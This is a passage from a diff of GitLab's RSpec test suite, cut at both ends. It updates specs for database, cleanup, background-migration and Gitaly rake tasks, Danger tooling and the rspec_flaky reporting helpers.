ApplicationRecord.connection.execute('SELECT SELECT FROM SELECT') }.to raise_error(ActiveRecord::StatementInvalid) + end + end end end diff --git a/spec/support_specs/helpers/graphql_helpers_spec.rb b/spec/support_specs/helpers/graphql_helpers_spec.rb index a9fe5b8d196..fae29ec32f5 100644 --- a/spec/support_specs/helpers/graphql_helpers_spec.rb +++ b/spec/support_specs/helpers/graphql_helpers_spec.rb @@ -43,6 +43,21 @@ RSpec.describe GraphqlHelpers do expect(graphql_dig_at(data, :foo, :nodes, :bar, :nodes, :id)).to eq([1, 2, 3, 4]) end + + it 'does not omit nils at the leaves' do + data = { + 'foo' => { + 'nodes' => [ + { 'bar' => { 'nodes' => [{ 'id' => nil }, { 'id' => 2 }] } }, + { 'bar' => { 'nodes' => [{ 'id' => 3 }, { 'id' => nil }] } }, + { 'bar' => nil } + ] + }, + 'irrelevant' => 'the field is a red-herring' + } + + expect(graphql_dig_at(data, :foo, :nodes, :bar, :nodes, :id)).to eq([nil, 2, 3, nil]) + end end describe 'var' do diff --git a/spec/tasks/gitlab/background_migrations_rake_spec.rb b/spec/tasks/gitlab/background_migrations_rake_spec.rb new file mode 100644 index 00000000000..079b4d3aea8 --- /dev/null +++ b/spec/tasks/gitlab/background_migrations_rake_spec.rb @@ -0,0 +1,49 @@ +# frozen_string_literal: true + +require 'rake_helper' + +RSpec.describe 'gitlab:background_migrations namespace rake tasks' do + before do + Rake.application.rake_require 'tasks/gitlab/background_migrations' + end + + describe 'finalize' do + subject(:finalize_task) { run_rake_task('gitlab:background_migrations:finalize', *arguments) } + + context 'without the proper arguments' do + let(:arguments) { %w[CopyColumnUsingBackgroundMigrationJob events id] } + + it 'exits without finalizing the migration' do + expect(Gitlab::Database::BackgroundMigration::BatchedMigrationRunner).not_to receive(:finalize) + + expect { finalize_task }.to output(/Must specify job_arguments as an argument/).to_stdout + .and raise_error(SystemExit) { |error| expect(error.status).to eq(1) } + end + end + + context 'with the proper arguments' do + let(:arguments) { %w[CopyColumnUsingBackgroundMigrationJob events id [["id1"\,"id2"]]] } + + it 'finalizes the matching migration' do + expect(Gitlab::Database::BackgroundMigration::BatchedMigrationRunner).to receive(:finalize) + .with('CopyColumnUsingBackgroundMigrationJob', 'events', 'id', [%w[id1 id2]]) + + expect { finalize_task }.to output(/Done/).to_stdout + end + end + end + + describe 'status' do + subject(:status_task) { run_rake_task('gitlab:background_migrations:status') } + + it 'outputs the status of background migrations' do + migration1 = create(:batched_background_migration, :finished, job_arguments: [%w[id1 id2]]) + migration2 = create(:batched_background_migration, :failed, job_arguments: []) + + expect { status_task }.to output(<<~OUTPUT).to_stdout + finished | #{migration1.job_class_name},#{migration1.table_name},#{migration1.column_name},[["id1","id2"]] + failed | #{migration2.job_class_name},#{migration2.table_name},#{migration2.column_name},[] + OUTPUT + end + end +end diff --git a/spec/tasks/gitlab/cleanup_rake_spec.rb b/spec/tasks/gitlab/cleanup_rake_spec.rb index 16c907ca87c..bd4d9643433 100644 --- a/spec/tasks/gitlab/cleanup_rake_spec.rb +++ b/spec/tasks/gitlab/cleanup_rake_spec.rb @@ -166,17 +166,17 @@ RSpec.describe 'gitlab:cleanup rake tasks', :silence_stdout do end context 'sessions' do - describe 'gitlab:cleanup:sessions:active_sessions_lookup_keys', :clean_gitlab_redis_shared_state do + describe 'gitlab:cleanup:sessions:active_sessions_lookup_keys', :clean_gitlab_redis_sessions do subject(:rake_task) { run_rake_task('gitlab:cleanup:sessions:active_sessions_lookup_keys') } let!(:user) { create(:user) } let(:existing_session_id) { '5' } before do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:#{existing_session_id}", - Marshal.dump(true)) - redis.sadd("session:lookup:user:gitlab:#{user.id}", (1..10).to_a) + Gitlab::Redis::Sessions.with do |redis| + redis.set(ActiveSession.key_name(user.id, existing_session_id), + ActiveSession.new(session_id: 'x').dump) + redis.sadd(ActiveSession.lookup_key_name(user.id), (1..10).to_a) end end @@ -185,11 +185,11 @@ RSpec.describe 'gitlab:cleanup rake tasks', :silence_stdout do end it 'removes expired active session lookup keys' do - Gitlab::Redis::SharedState.with do |redis| - lookup_key = "session:lookup:user:gitlab:#{user.id}" + Gitlab::Redis::Sessions.with do |redis| + lookup_key = ActiveSession.lookup_key_name(user.id) + expect { subject }.to change { redis.scard(lookup_key) }.from(10).to(1) - expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).to( - eql([existing_session_id])) + expect(redis.smembers(lookup_key)).to contain_exactly existing_session_id end end end diff --git a/spec/tasks/gitlab/db_rake_spec.rb b/spec/tasks/gitlab/db_rake_spec.rb index 38392f77307..830d0dded2e 100644 --- a/spec/tasks/gitlab/db_rake_spec.rb +++ b/spec/tasks/gitlab/db_rake_spec.rb @@ -138,6 +138,10 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do stub_file_read(structure_file, content: input) allow(File).to receive(:open).with(structure_file.to_s, any_args).and_yield(output) end + + if Gitlab.ee? + allow(File).to receive(:open).with(Rails.root.join(Gitlab::Database::GEO_DATABASE_DIR, 'structure.sql').to_s, any_args).and_yield(output) + end end after do @@ -191,7 +195,7 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do it 'drops extra schemas' do Gitlab::Database::EXTRA_SCHEMAS.each do |schema| - expect(connection).to receive(:execute).with("DROP SCHEMA IF EXISTS \"#{schema}\"") + expect(connection).to receive(:execute).with("DROP SCHEMA IF EXISTS \"#{schema}\" CASCADE") end subject @@ -199,43 +203,38 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do end describe 'reindex' do - let(:reindex) { double('reindex') } - let(:indexes) { double('indexes') } - let(:databases) { Gitlab::Database.database_base_models } - let(:databases_count) { databases.count } - - it 'cleans up any leftover indexes' do - expect(Gitlab::Database::Reindexing).to receive(:cleanup_leftovers!).exactly(databases_count).times + it 'delegates to Gitlab::Database::Reindexing' do + expect(Gitlab::Database::Reindexing).to receive(:invoke) run_rake_task('gitlab:db:reindex') end - context 'when async index creation is enabled' do - it 'executes async index creation prior to any reindexing actions' do - stub_feature_flags(database_async_index_creation: true) - - expect(Gitlab::Database::AsyncIndexes).to receive(:create_pending_indexes!).ordered.exactly(databases_count).times - expect(Gitlab::Database::Reindexing).to receive(:automatic_reindexing).ordered.exactly(databases_count).times + context 'when reindexing is not enabled' do + it 'is a no-op' do + expect(Gitlab::Database::Reindexing).to receive(:enabled?).and_return(false) + expect(Gitlab::Database::Reindexing).not_to receive(:invoke) run_rake_task('gitlab:db:reindex') end end + end - context 'when async index creation is disabled' do - it 'does not execute async index creation' do - stub_feature_flags(database_async_index_creation: false) - - expect(Gitlab::Database::AsyncIndexes).not_to receive(:create_pending_indexes!) + databases = ActiveRecord::Tasks::DatabaseTasks.setup_initial_database_yaml + ActiveRecord::Tasks::DatabaseTasks.for_each(databases) do |database_name| + describe "reindex:#{database_name}" do + it 'delegates to Gitlab::Database::Reindexing' do + expect(Gitlab::Database::Reindexing).to receive(:invoke).with(database_name) - run_rake_task('gitlab:db:reindex') + run_rake_task("gitlab:db:reindex:#{database_name}") end - end - context 'calls automatic reindexing' do - it 'uses all candidate indexes' do - expect(Gitlab::Database::Reindexing).to receive(:automatic_reindexing).exactly(databases_count).times + context 'when reindexing is not enabled' do + it 'is a no-op' do + expect(Gitlab::Database::Reindexing).to receive(:enabled?).and_return(false) + expect(Gitlab::Database::Reindexing).not_to receive(:invoke).with(database_name) - run_rake_task('gitlab:db:reindex') + run_rake_task("gitlab:db:reindex:#{database_name}") + end end end end @@ -328,6 +327,32 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do end end + context 'with multiple databases', :reestablished_active_record_base do + before do + allow(ActiveRecord::Tasks::DatabaseTasks).to receive(:setup_initial_database_yaml).and_return([:main, :geo]) + end + + describe 'db:structure:dump' do + it 'invokes gitlab:db:clean_structure_sql' do + skip unless Gitlab.ee? + + expect(Rake::Task['gitlab:db:clean_structure_sql']).to receive(:invoke).twice.and_return(true) + + expect { run_rake_task('db:structure:dump:main') }.not_to raise_error + end + end + + describe 'db:schema:dump' do + it 'invokes gitlab:db:clean_structure_sql' do + skip unless Gitlab.ee? + + expect(Rake::Task['gitlab:db:clean_structure_sql']).to receive(:invoke).once.and_return(true) + + expect { run_rake_task('db:schema:dump:main') }.not_to raise_error + end + end + end + def run_rake_task(task_name, arguments = '') Rake::Task[task_name].reenable Rake.application.invoke_task("#{task_name}#{arguments}") diff --git a/spec/tasks/gitlab/gitaly_rake_spec.rb b/spec/tasks/gitlab/gitaly_rake_spec.rb index c5625db922d..70c7ddb1d6e 100644 --- a/spec/tasks/gitlab/gitaly_rake_spec.rb +++ b/spec/tasks/gitlab/gitaly_rake_spec.rb @@ -7,26 +7,26 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do Rake.application.rake_require 'tasks/gitlab/gitaly' end - describe 'install' do - let(:repo) { 'https://gitlab.com/gitlab-org/gitaly.git' } - let(:clone_path) { Rails.root.join('tmp/tests/gitaly').to_s } - let(:storage_path) { Rails.root.join('tmp/tests/repositories').to_s } - let(:version) { File.read(Rails.root.join(Gitlab::GitalyClient::SERVER_VERSION_FILE)).chomp } + let(:repo) { 'https://gitlab.com/gitlab-org/gitaly.git' } + let(:clone_path) { Rails.root.join('tmp/tests/gitaly').to_s } + let(:storage_path) { Rails.root.join('tmp/tests/repositories').to_s } + let(:version) { File.read(Rails.root.join(Gitlab::GitalyClient::SERVER_VERSION_FILE)).chomp } - subject { run_rake_task('gitlab:gitaly:install', clone_path, storage_path) } + describe 'clone' do + subject { run_rake_task('gitlab:gitaly:clone', clone_path, storage_path) } context 'no dir given' do it 'aborts and display a help message' do # avoid writing task output to spec progress allow($stderr).to receive :write - expect { run_rake_task('gitlab:gitaly:install') }.to raise_error /Please specify the directory where you want to install gitaly and the path for the default storage/ + expect { run_rake_task('gitlab:gitaly:clone') }.to raise_error /Please specify the directory where you want to install gitaly and the path for the default storage/ end end context 'no storage path given' do it 'aborts and display a help message' do allow($stderr).to receive :write - expect { run_rake_task('gitlab:gitaly:install', clone_path) }.to raise_error /Please specify the directory where you want to install gitaly and the path for the default storage/ + expect { run_rake_task('gitlab:gitaly:clone', clone_path) }.to raise_error /Please specify the directory where you want to install gitaly and the path for the default storage/ end end @@ -40,11 +40,6 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do end describe 'checkout or clone' do - before do - stub_env('CI', false) - expect(Dir).to receive(:chdir).with(clone_path) - end - it 'calls checkout_or_clone_version with the right arguments' do expect(main_object) .to receive(:checkout_or_clone_version).with(version: version, repo: repo, target_dir: clone_path, clone_opts: %w[--depth 1]) @@ -52,6 +47,10 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do subject end end + end + + describe 'install' do + subject { run_rake_task('gitlab:gitaly:install', clone_path, storage_path) } describe 'gmake/make' do before do @@ -62,10 +61,6 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do end context 'gmake is available' do - before do - expect(main_object).to receive(:checkout_or_clone_version) - end - it 'calls gmake in the gitaly directory' do expect(Gitlab::Popen).to receive(:popen) .with(%w[which gmake]) @@ -93,7 +88,6 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do context 'gmake is not available' do before do - expect(main_object).to receive(:checkout_or_clone_version) expect(Gitlab::Popen).to receive(:popen) .with(%w[which gmake]) .and_return(['', 42]) diff --git a/spec/tasks/gitlab/task_helpers_spec.rb b/spec/tasks/gitlab/task_helpers_spec.rb index 2921913319b..0c43dd15e8c 100644 --- a/spec/tasks/gitlab/task_helpers_spec.rb +++ b/spec/tasks/gitlab/task_helpers_spec.rb @@ -72,6 +72,8 @@ RSpec.describe Gitlab::TaskHelpers do describe '#checkout_version' do it 'clones the repo in the target dir' do expect(subject) + .to receive(:run_command!).with(%W[#{Gitlab.config.git.bin_path} -C #{clone_path} config protocol.version 2]) + expect(subject) .to receive(:run_command!).with(%W[#{Gitlab.config.git.bin_path} -C #{clone_path} fetch --quiet origin #{tag}]) expect(subject) .to receive(:run_command!).with(%W[#{Gitlab.config.git.bin_path} -C #{clone_path} checkout -f --quiet FETCH_HEAD --]) diff --git a/spec/tooling/danger/product_intelligence_spec.rb b/spec/tooling/danger/product_intelligence_spec.rb index c090dbb4de4..d0d4b8d4df4 100644 --- a/spec/tooling/danger/product_intelligence_spec.rb +++ b/spec/tooling/danger/product_intelligence_spec.rb @@ -65,13 +65,25 @@ RSpec.describe Tooling::Danger::ProductIntelligence do it { is_expected.to be_empty } end end + end + + describe '#skip_review' do + subject { product_intelligence.skip_review? } context 'with growth experiment label' do before do allow(fake_helper).to receive(:mr_has_labels?).with('growth experiment').and_return(true) end - it { is_expected.to be_empty } + it { is_expected.to be true } + end + + context 'without growth experiment label' do + before do + allow(fake_helper).to receive(:mr_has_labels?).with('growth experiment').and_return(false) + end + + it { is_expected.to be false } end end end diff --git a/spec/tooling/danger/project_helper_spec.rb b/spec/tooling/danger/project_helper_spec.rb index ec475df6d83..f13083bdf0a 100644 --- a/spec/tooling/danger/project_helper_spec.rb +++ b/spec/tooling/danger/project_helper_spec.rb @@ -3,7 +3,7 @@ require 'rspec-parameterized' require 'gitlab-dangerfiles' require 'danger' -require 'danger/plugins/helper' +require 'danger/plugins/internal/helper' require 'gitlab/dangerfiles/spec_helper' require_relative '../../../danger/plugins/project_helper' @@ -20,22 +20,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do before do allow(project_helper).to receive(:helper).and_return(fake_helper) - end - - describe '#changes' do - it 'returns an array of Change objects' do - expect(project_helper.changes).to all(be_an(Gitlab::Dangerfiles::Change)) - end - - it 'groups changes by change type' do - changes = project_helper.changes - - expect(changes.added.files).to eq(added_files) - expect(changes.modified.files).to eq(modified_files) - expect(changes.deleted.files).to eq(deleted_files) - expect(changes.renamed_before.files).to eq([renamed_before_file]) - expect(changes.renamed_after.files).to eq([renamed_after_file]) - end + allow(fake_helper).to receive(:config).and_return(double(files_to_category: described_class::CATEGORIES)) end describe '#categories_for_file' do @@ -86,7 +71,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do 'rubocop/foo' | [:backend] '.rubocop.yml' | [:backend] '.rubocop_todo.yml' | [:backend] - '.rubocop_manual_todo.yml' | [:backend] + '.rubocop_todo/cop/name.yml' | [:backend] 'spec/foo' | [:backend] 'spec/foo/bar' | [:backend] @@ -192,6 +177,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do 'spec/frontend/tracking_spec.js' | [:frontend, :product_intelligence] 'lib/gitlab/usage_database/foo.rb' | [:backend] 'config/metrics/counts_7d/test_metric.yml' | [:product_intelligence] + 'config/events/snowplow_event.yml' | [:product_intelligence] 'config/metrics/schema.json' | [:product_intelligence] 'doc/api/usage_data.md' | [:product_intelligence] 'spec/lib/gitlab/usage_data_spec.rb' | [:product_intelligence] @@ -246,7 +232,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do end with_them do - subject { project_helper.categories_for_file(path) } + subject { project_helper.helper.categories_for_file(path) } it { is_expected.to eq(expected_categories) } end @@ -274,7 +260,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do changed_files.each do |file| allow(fake_git).to receive(:diff_for_file).with(file) { double(:diff, patch: patch) } - expect(project_helper.categories_for_file(file)).to eq(expected_categories) + expect(project_helper.helper.categories_for_file(file)).to eq(expected_categories) end end end @@ -283,7 +269,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do describe '.local_warning_message' do it 'returns an informational message with rules that can run' do - expect(described_class.local_warning_message).to eq('==> Only the following Danger rules can be run locally: changelog, database, documentation, duplicate_yarn_dependencies, eslint, gitaly, pajamas, pipeline, prettier, product_intelligence, utility_css, vue_shared_documentation') + expect(described_class.local_warning_message).to eq('==> Only the following Danger rules can be run locally: changelog, ci_config, database, documentation, duplicate_yarn_dependencies, eslint, gitaly, pajamas, pipeline, prettier, product_intelligence, utility_css, vue_shared_documentation') end end @@ -320,93 +306,13 @@ RSpec.describe Tooling::Danger::ProjectHelper do it 'returns all changed files starting with ee/' do changes = double - expect(project_helper).to receive(:changes).and_return(changes) + expect(fake_helper).to receive(:changes).and_return(changes) expect(changes).to receive(:files).and_return(%w[fr/ee/beer.rb ee/wine.rb ee/lib/ido.rb ee.k]) is_expected.to match_array(%w[ee/wine.rb ee/lib/ido.rb]) end end - describe '#project_name' do - subject { project_helper.project_name } - - it 'returns gitlab if ee? returns true' do - expect(project_helper).to receive(:ee?) { true } - - is_expected.to eq('gitlab') - end - - it 'returns gitlab-ce if ee? returns false' do - expect(project_helper).to receive(:ee?) { false } - - is_expected.to eq('gitlab-foss') - end - end - - describe '#ee?' do - subject { project_helper.__send__(:ee?) } - - let(:ee_dir) { File.expand_path('../../../ee', __dir__) } - - context 'when ENV["CI_PROJECT_NAME"] is set' do - before do - stub_env('CI_PROJECT_NAME', ci_project_name) - end - - context 'when ENV["CI_PROJECT_NAME"] is gitlab' do - let(:ci_project_name) { 'gitlab' } - - it 'returns true' do - is_expected.to eq(true) - end - end - - context 'when ENV["CI_PROJECT_NAME"] is gitlab-ee' do - let(:ci_project_name) { 'gitlab-ee' } - - it 'returns true' do - is_expected.to eq(true) - end - end - - context 'when ENV["CI_PROJECT_NAME"] is gitlab-foss' do - let(:ci_project_name) { 'gitlab-foss' } - - it 'resolves to Dir.exist?' do - expected = Dir.exist?(ee_dir) - - expect(Dir).to receive(:exist?).with(ee_dir).and_call_original - - is_expected.to eq(expected) - end - end - end - - context 'when ENV["CI_PROJECT_NAME"] is absent' do - before do - stub_env('CI_PROJECT_NAME', nil) - - expect(Dir).to receive(:exist?).with(ee_dir).and_return(has_ee_dir) - end - - context 'when ee/ directory exists' do - let(:has_ee_dir) { true } - - it 'returns true' do - is_expected.to eq(true) - end - end - - context 'when ee/ directory does not exist' do - let(:has_ee_dir) { false } - - it 'returns false' do - is_expected.to eq(false) - end - end - end - end - describe '#file_lines' do let(:filename) { 'spec/foo_spec.rb' } let(:file_spy) { spy } diff --git a/spec/tooling/danger/specs_spec.rb b/spec/tooling/danger/specs_spec.rb index a5978020c9d..b2454960a7b 100644 --- a/spec/tooling/danger/specs_spec.rb +++ b/spec/tooling/danger/specs_spec.rb @@ -3,7 +3,7 @@ require 'rspec-parameterized' require 'gitlab-dangerfiles' require 'danger' -require 'danger/plugins/helper' +require 'danger/plugins/internal/helper' require 'gitlab/dangerfiles/spec_helper' require_relative '../../../tooling/danger/specs' diff --git a/spec/tooling/graphql/docs/renderer_spec.rb b/spec/tooling/graphql/docs/renderer_spec.rb index 1c9605304ff..18256fea2d6 100644 --- a/spec/tooling/graphql/docs/renderer_spec.rb +++ b/spec/tooling/graphql/docs/renderer_spec.rb @@ -438,12 +438,12 @@ RSpec.describe Tooling::Graphql::Docs::Renderer do mutation.description 'Make everything very pretty.' mutation.argument :prettiness_factor, - type: GraphQL::FLOAT_TYPE, + type: GraphQL::Types::Float, required: true, description: 'How much prettier?' mutation.argument :pulchritude, - type: GraphQL::FLOAT_TYPE, + type: GraphQL::Types::Float, required: false, description: 'How much prettier?', deprecated: { diff --git a/spec/tooling/quality/test_level_spec.rb b/spec/tooling/quality/test_level_spec.rb index 94fa9d682e1..8a944a473d7 100644 --- a/spec/tooling/quality/test_level_spec.rb +++ b/spec/tooling/quality/test_level_spec.rb @@ -28,7 +28,7 @@ RSpec.describe Quality::TestLevel do context 'when level is unit' do it 'returns a pattern' do expect(subject.pattern(:unit)) - .to eq("spec/{bin,channels,config,db,dependencies,elastic,elastic_integration,experiments,factories,finders,frontend,graphql,haml_lint,helpers,initializers,javascripts,lib,models,policies,presenters,rack_servers,replicators,routing,rubocop,scripts,serializers,services,sidekiq,spam,support_specs,tasks,uploaders,validators,views,workers,tooling}{,/**/}*_spec.rb") + .to eq("spec/{bin,channels,config,db,dependencies,elastic,elastic_integration,experiments,factories,finders,frontend,graphql,haml_lint,helpers,initializers,javascripts,lib,metrics_server,models,policies,presenters,rack_servers,replicators,routing,rubocop,scripts,serializers,services,sidekiq,sidekiq_cluster,spam,support_specs,tasks,uploaders,validators,views,workers,tooling}{,/**/}*_spec.rb") end end @@ -110,7 +110,7 @@ RSpec.describe Quality::TestLevel do context 'when level is unit' do it 'returns a regexp' do expect(subject.regexp(:unit)) - .to eq(%r{spec/(bin|channels|config|db|dependencies|elastic|elastic_integration|experiments|factories|finders|frontend|graphql|haml_lint|helpers|initializers|javascripts|lib|models|policies|presenters|rack_servers|replicators|routing|rubocop|scripts|serializers|services|sidekiq|spam|support_specs|tasks|uploaders|validators|views|workers|tooling)}) + .to eq(%r{spec/(bin|channels|config|db|dependencies|elastic|elastic_integration|experiments|factories|finders|frontend|graphql|haml_lint|helpers|initializers|javascripts|lib|metrics_server|models|policies|presenters|rack_servers|replicators|routing|rubocop|scripts|serializers|services|sidekiq|sidekiq_cluster|spam|support_specs|tasks|uploaders|validators|views|workers|tooling)}) end end diff --git a/spec/tooling/rspec_flaky/flaky_example_spec.rb b/spec/tooling/rspec_flaky/flaky_example_spec.rb index ab652662c0b..03436ee1cbd 100644 --- a/spec/tooling/rspec_flaky/flaky_example_spec.rb +++ b/spec/tooling/rspec_flaky/flaky_example_spec.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true -require 'active_support/testing/time_helpers' require_relative '../../support/helpers/stub_env' +require_relative '../../support/time_travel' require_relative '../../../tooling/rspec_flaky/flaky_example' @@ -36,40 +36,39 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do } end - let(:example) { OpenStruct.new(example_attrs) } - before do # Stub these env variables otherwise specs don't behave the same on the CI - stub_env('CI_PROJECT_URL', nil) - stub_env('CI_JOB_ID', nil) + stub_env('CI_JOB_URL', nil) end - describe '#initialize' do + describe '#initialize', :freeze_time do shared_examples 'a valid FlakyExample instance' do let(:flaky_example) { described_class.new(args) } it 'returns valid attributes' do - expect(flaky_example.uid).to eq(flaky_example_attrs[:uid]) - expect(flaky_example.file).to eq(flaky_example_attrs[:file]) - expect(flaky_example.line).to eq(flaky_example_attrs[:line]) - expect(flaky_example.description).to eq(flaky_example_attrs[:description]) - expect(flaky_example.first_flaky_at).to eq(expected_first_flaky_at) - expect(flaky_example.last_flaky_at).to eq(expected_last_flaky_at) - expect(flaky_example.last_attempts_count).to eq(flaky_example_attrs[:last_attempts_count]) - expect(flaky_example.flaky_reports).to eq(expected_flaky_reports) + attrs = flaky_example.to_h + + expect(attrs[:uid]).to eq(flaky_example_attrs[:uid]) + expect(attrs[:file]).to eq(flaky_example_attrs[:file]) + expect(attrs[:line]).to eq(flaky_example_attrs[:line]) + expect(attrs[:description]).to eq(flaky_example_attrs[:description]) + expect(attrs[:first_flaky_at]).to eq(expected_first_flaky_at) + expect(attrs[:last_flaky_at]).to eq(expected_last_flaky_at) + expect(attrs[:last_attempts_count]).to eq(flaky_example_attrs[:last_attempts_count]) + expect(attrs[:flaky_reports]).to eq(expected_flaky_reports) end end - context 'when given an Rspec::Example' do + context 'when given an Example hash' do it_behaves_like 'a valid FlakyExample instance' do - let(:args) { example } - let(:expected_first_flaky_at) { nil } - let(:expected_last_flaky_at) { nil } + let(:args) { example_attrs } + let(:expected_first_flaky_at) { Time.now } + let(:expected_last_flaky_at) { Time.now } let(:expected_flaky_reports) { 0 } end end - context 'when given a hash' do + context 'when given a FlakyExample hash' do it_behaves_like 'a valid FlakyExample instance' do let(:args) { flaky_example_attrs } let(:expected_flaky_reports) { flaky_example_attrs[:flaky_reports] } @@ -89,17 +88,17 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do freeze_time do flaky_example.update_flakiness! - expect(flaky_example.first_flaky_at).to eq(Time.now) + expect(flaky_example.to_h[:first_flaky_at]).to eq(Time.now) end end it 'maintains the first_flaky_at if exists' do flaky_example.update_flakiness! - expected_first_flaky_at = flaky_example.first_flaky_at + expected_first_flaky_at = flaky_example.to_h[:first_flaky_at] travel_to(Time.now + 42) do flaky_example.update_flakiness! - expect(flaky_example.first_flaky_at).to eq(expected_first_flaky_at) + expect(flaky_example.to_h[:first_flaky_at]).to eq(expected_first_flaky_at) end end @@ -108,53 +107,54 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do the_future = Time.now flaky_example.update_flakiness! - expect(flaky_example.last_flaky_at).to eq(the_future) + expect(flaky_example.to_h[:last_flaky_at]).to eq(the_future) end end it 'updates the flaky_reports' do - expected_flaky_reports = flaky_example.first_flaky_at ? flaky_example.flaky_reports + 1 : 1 + expected_flaky_reports = flaky_example.to_h[:first_flaky_at] ? flaky_example.to_h[:flaky_reports] + 1 : 1 - expect { flaky_example.update_flakiness! }.to change { flaky_example.flaky_reports }.by(1) - expect(flaky_example.flaky_reports).to eq(expected_flaky_reports) + expect { flaky_example.update_flakiness! }.to change { flaky_example.to_h[:flaky_reports] }.by(1) + expect(flaky_example.to_h[:flaky_reports]).to eq(expected_flaky_reports) end context 'when passed a :last_attempts_count' do it 'updates the last_attempts_count' do flaky_example.update_flakiness!(last_attempts_count: 42) - expect(flaky_example.last_attempts_count).to eq(42) + expect(flaky_example.to_h[:last_attempts_count]).to eq(42) end end context 'when run on the CI' do + let(:job_url) { 'https://gitlab.com/gitlab-org/gitlab-foss/-/jobs/42' } + before do - stub_env('CI_PROJECT_URL', 'https://gitlab.com/gitlab-org/gitlab-foss') - stub_env('CI_JOB_ID', 42) + stub_env('CI_JOB_URL', job_url) end it 'updates the last_flaky_job' do flaky_example.update_flakiness! - expect(flaky_example.last_flaky_job).to eq('https://gitlab.com/gitlab-org/gitlab-foss/-/jobs/42') + expect(flaky_example.to_h[:last_flaky_job]).to eq(job_url) end end end - context 'when given an Rspec::Example' do + context 'when given an Example hash' do it_behaves_like 'an up-to-date FlakyExample instance' do - let(:args) { example } + let(:args) { example_attrs } end end - context 'when given a hash' do + context 'when given a FlakyExample hash' do it_behaves_like 'an up-to-date FlakyExample instance' do let(:args) { flaky_example_attrs } end end end - describe '#to_h' do + describe '#to_h', :freeze_time do shared_examples 'a valid FlakyExample hash' do let(:additional_attrs) { {} } @@ -166,17 +166,17 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do end end - context 'when given an Rspec::Example' do - let(:args) { example } + context 'when given an Example hash' do + let(:args) { example_attrs } it_behaves_like 'a valid FlakyExample hash' do let(:additional_attrs) do - { first_flaky_at: nil, last_flaky_at: nil, last_flaky_job: nil, flaky_reports: 0 } + { first_flaky_at: Time.now, last_flaky_at: Time.now, last_flaky_job: nil, flaky_reports: 0 } end end end - context 'when given a hash' do + context 'when given a FlakyExample hash' do let(:args) { flaky_example_attrs } it_behaves_like 'a valid FlakyExample hash' diff --git a/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb b/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb index 823459e31b4..e5f985c9596 100644 --- a/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb +++ b/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb @@ -1,8 +1,10 @@ # frozen_string_literal: true +require_relative '../../support/time_travel' + require_relative '../../../tooling/rspec_flaky/flaky_examples_collection' -RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures do +RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures, :freeze_time do let(:collection_hash) do { a: { example_id: 'spec/foo/bar_spec.rb:2' }, @@ -14,15 +16,19 @@ RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures do { a: { example_id: 'spec/foo/bar_spec.rb:2', - first_flaky_at: nil, - last_flaky_at: nil, - last_flaky_job: nil + first_flaky_at: Time.now, + last_flaky_at: Time.now, + last_flaky_job: nil, + flaky_reports: 0, + last_attempts_count: nil }, b: { example_id: 'spec/foo/baz_spec.rb:3', - first_flaky_at: nil, - last_flaky_at: nil, - last_flaky_job: nil + first_flaky_at: Time.now, + last_flaky_at: Time.now, + last_flaky_job: nil, + flaky_reports: 0, + last_attempts_count: nil } } end @@ -59,9 +65,11 @@ RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures do expect((collection2 - collection1).to_h).to eq( c: { example_id: 'spec/bar/baz_spec.rb:4', - first_flaky_at: nil, - last_flaky_at: nil, - last_flaky_job: nil + first_flaky_at: Time.now, + last_flaky_at: Time.now, + last_flaky_job: nil, + flaky_reports: 0, + last_attempts_count: nil }) end diff --git a/spec/tooling/rspec_flaky/listener_spec.rb b/spec/tooling/rspec_flaky/listener_spec.rb index 429724a20cf..51a815dafbf 100644 --- a/spec/tooling/rspec_flaky/listener_spec.rb +++ b/spec/tooling/rspec_flaky/listener_spec.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true -require 'active_support/testing/time_helpers' require_relative '../../support/helpers/stub_env' +require_relative '../../support/time_travel' require_relative '../../../tooling/rspec_flaky/listener' @@ -53,8 +53,7 @@ RSpec.describe RspecFlaky::Listener, :aggregate_failures do before do # Stub these env variables otherwise specs don't behave the same on the CI - stub_env('CI_PROJECT_URL', nil) - stub_env('CI_JOB_ID', nil) + stub_env('CI_JOB_URL', nil) stub_env('SUITE_FLAKY_RSPEC_REPORT_PATH', nil) end @@ -217,7 +216,7 @@ RSpec.describe RspecFlaky::Listener, :aggregate_failures do expect(RspecFlaky::Report).to receive(:new).with(listener.flaky_examples).and_return(report1) expect(report1).to receive(:write).with(RspecFlaky::Config.flaky_examples_report_path) - expect(RspecFlaky::Report).to receive(:new).with(listener.flaky_examples - listener.suite_flaky_examples).and_return(report2) + expect(RspecFlaky::Report).to receive(:new).with(listener.__send__(:new_flaky_examples)).and_return(report2) expect(report2).to receive(:write).with(RspecFlaky::Config.new_flaky_examples_report_path) listener.dump_summary(nil) diff --git a/spec/tooling/rspec_flaky/report_spec.rb 